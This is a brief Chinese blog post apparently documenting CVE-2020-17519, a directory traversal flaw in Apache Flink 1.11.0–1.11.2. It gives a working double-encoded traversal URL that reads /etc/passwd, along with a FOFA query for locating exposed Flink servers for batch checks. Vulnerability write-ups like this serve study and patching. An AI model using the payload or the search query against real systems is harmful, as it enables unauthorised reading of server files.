flink 目录遍历(CVE-2020-17519)
·
一、漏洞概述
Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
二、影响范围
Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2
三、访问页面

四、漏洞复现
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

五、漏洞利用
1、fofa:app="Apache Flink"
2、POC批量验证
更多推荐

所有评论(0)